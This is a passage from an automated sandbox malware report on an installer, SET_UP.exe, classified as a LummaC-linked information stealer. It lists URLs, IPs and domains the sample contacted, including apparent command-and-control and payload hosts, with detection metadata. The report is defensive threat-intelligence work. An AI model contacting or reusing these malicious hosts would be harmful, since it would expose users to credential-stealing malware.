                                        https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUSET_UP.exe, 00000000.00000003.1968564993.0000000003A18000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965099584.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966990463.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1969681725.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968481399.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1971285796.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964736489.0000000003AEA000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1977051010.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967202416.0000000003BFF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1972519369.0000000003C67000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1967833052.0000000003B1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965800504.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1963898121.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1973060526.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1966880719.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1965024411.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1968373832.0000000003A1C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964648647.0000000003A17000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1970689425.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1964384270.0000000003A14000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2019740699.0000000003A1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://certs.securetrust.com/CA0:SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://cutefingeuker.click/piSET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/ac/?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.tomabo.com/mp4-player/update.xml5.3.10CMP4PlayerDocGoSET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ocsp.vikingcloud.com/0ASET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://certs.securetrust.com/issuers/TWGCA.crt0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.vikingcloud.com/0:SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cegu.shop/SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dfgh.online/invoker.php?compName=powershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://klipvumisui.shop/int_clp_sha.txtf1$mSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cutefingeuker.click/SET_UP.exe, SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909206800.000000000081A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909305895.0000000000822000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1909274602.000000000081F000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://klipvumisui.shop/int_clp_sha.txtFmsZrSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://crl.vikingcloud.com/TWGCA.crl0tSET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cutefingeuker.click/pi1SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cutefingeuker.click/buLSET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://certs.securetrust.com/CA05SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.tomabo.com/mp4-player/purchase.htmlSET_UP.exefalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://cutefingeuker.click/api1SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://x1.c.lencr.org/0SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cutefingeuker.click/QQSET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallSET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://dfgh.online/invoSET_UP.exetrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://cutefingeuker.click/bubSET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cegu.shop/uSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://certs.securetrust.com/CA0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.tomabo.com/mp4-player/download.htmlSET_UP.exe, SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.tomabo.com/mp4-playerASET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://support.mozilla.org/products/firefoxgro.allSET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cutefingeuker.click/8SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.trustwave.com/TWGCA.crl0nSET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2021971522.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cutefingeuker.click/api#SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://klipvumisui.shop/YSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoSET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.tomabo.com/videos/dog-and-balls.mp4SET_UP.exe, 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://crl.securetrust.com/TWGCSCA_L1.crl0ySET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cutefingeuker.click/&&.SET_UP.exe, 00000000.00000003.1929874990.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://ocsp.rootca1.amazontrust.com0:SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016SET_UP.exe, 00000000.00000003.1861986622.000000000376C000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1862063794.0000000003765000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1873500798.0000000003765000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://klipvumisui.shop/LSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            http://certificates.starfieldtech.com/repository/1604SET_UP.exe, 00000000.00000002.2021853788.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021163618.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.ecosia.org/newtab/SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cutefingeuker.click:443/apiSET_UP.exe, 00000000.00000002.2021753399.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2020979262.00000000007AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSET_UP.exe, 00000000.00000003.1895254426.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://klipvumisui.shop/SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.comMP4SET_UP.exe, 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp, SET_UP.exe, 00000000.00000003.1832528276.0000000002DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://cutefingeuker.clGSSET_UP.exe, 00000000.00000003.1909274602.0000000000830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.tomabo.com/mp4-playerSET_UP.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://crl.microSET_UP.exe, 00000000.00000003.1929948835.00000000007B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://support.microsofSET_UP.exe, 00000000.00000003.1861986622.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?SET_UP.exe, 00000000.00000003.1894477913.000000000374F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://cutefingeuker.click/apigSET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1929874990.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://ocsp.securetrust.com/0?SET_UP.exe, 00000000.00000003.2020875278.000000000378E000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2021147768.000000000080E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017408560.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesSET_UP.exe, 00000000.00000003.1862063794.0000000003740000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://cegu.shop/8574262446/ph.txtk9SET_UP.exe, 00000000.00000003.1959023412.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2017474036.000000000081B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2022076289.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://www.tomabo.comSET_UP.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://www.tomabo.com/mp4-player/update.xmlSET_UP.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SET_UP.exe, 00000000.00000003.1861738782.0000000003728000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://dfgh.online/invoker.php?compName=hZpowershell.exe, 00000004.00000002.1956147215.0000000005112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    104.21.37.128
                                                                                                                    		klipvumisui.shopUnited States
                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                    188.114.96.3
                                                                                                                    		cutefingeuker.clickEuropean Union
                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                    185.161.251.21
                                                                                                                    		cegu.shopUnited Kingdom
                                                                                                                    		5089NTLGBfalse

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1584507
                                                                                                                    Start date and time:2025-01-05 18:01:10 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 10m 8s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:38
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:SET_UP.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@59/13@3/3
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 33.3%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 53%
                                                                                                                    • Number of executed functions: 30
                                                                                                                    • Number of non-executed functions: 232
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target BrightLib.exe, PID 7748 because there are no executed function
                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    12:02:18API Interceptor10x Sleep call for process: SET_UP.exe modified
                                                                                                                    12:03:20API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    104.21.37.128Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                          re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                      !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        188.114.96.3Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                        • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                                                        CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.mffnow.info/1a34/
                                                                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.mydreamdeal.click/1ag2/
                                                                                                                                        SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.questmatch.pro/ipd6/
                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                                        185.161.251.21Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        cegu.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 185.161.251.21
                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaCBrowse
